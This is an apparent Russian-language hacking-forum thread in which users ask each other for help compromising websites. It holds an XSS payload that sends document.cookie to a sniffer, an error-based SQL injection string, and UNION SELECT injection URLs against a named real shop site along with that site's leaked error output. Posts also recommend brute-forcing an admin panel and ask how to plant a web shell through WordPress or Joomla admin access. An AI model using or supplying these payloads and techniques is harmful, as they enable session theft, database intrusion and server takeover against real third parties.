Ваши вопросы по уязвимостям.

только это нарыл..http://www.securitylab.ru/vulnerability/199904.php
а так заливай шелл и три хтацес..

 

нет не какого доступа на сервер
админка так защищена.

 

я еще не слышал об обходе такого
ПС
БрутЬ, брутЬ и еще раз ЬрутЪ

 

Подскажите пожалуйста.
На сайте при вводе вместо логина <script>alert()</script> выскакивает табличка. я так понял это xss. Покурили маны малеха ну так и не допёр. модифицирую запрос до
<sсriрt>img = new Image(); img.src = "путь до снифа?"+document.cookie;</sсriрt>

вставляю в то же поля и ничего не выскакивает. в чем прикол?

 

Прикол в том, что ничего и не выскочит, но куки отправятся на сниффер.

 

Спасибо. буду разбираться. у меня сниф делюкс и мильти каника, что то не ловит куки.

 

Что может мешать сделать бекконект ?Система freebsd 7.2.
Спасибо

 

Может быть тот порт занят через который ты бэкконнект делаешь.

 

сорь, я неправильно поставил вопрос.
Что мешает забиндить порт?

 

Подскажите, как правильно составить запрос?

form.php?pageid=93'+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.COLUMNS+where+column_name+like+0x257025),1,64),floor(rand(0)*2)))z)+--+

 

Hi Team;

http://www.ibuycc.com.cn/product.php?id=77'

этого сайта SQL ошибка. Я пытался использовать "union select" до 50, но не результатом
Можем ли мы "inject" этот сайт?

 

есть готовый брут под этот случай?

 

Code:

http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

хватит спрашивать одно и тоже. читай статьи и всё будет ясно

так видно? О_о

Code:

http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),version(),7,version(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

 

Благодарю за ответ, но не отображать версии


Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/ibuyccco/public_html/product.php on line 295

Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 182

Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 192
‹�����xÚí}ëwG¶ïçËZùú(k]

 

Убери пробелы...

 

Попробуй этот: https://forum.antichat.ru/thread109600.html

 

Как залить шелл имея доступ к админке wp?

 

Anarh1st
неужели так трудно набрать в поиске нужные слова?

https://forum.antichat.ru/showpost.php?p=770176&postcount=3

 

Извиняюсь =[
Cпасибо

 

Подскажите, как залить шелл имея доступ к админке на joomla?
В Global Configuration разрешаю загрузку php, но когда захожу в Media Manager , то при загрузке шелла (в *.php) пишет: "Not a valid image." Как решить проблему? И как залить шелл другим способом?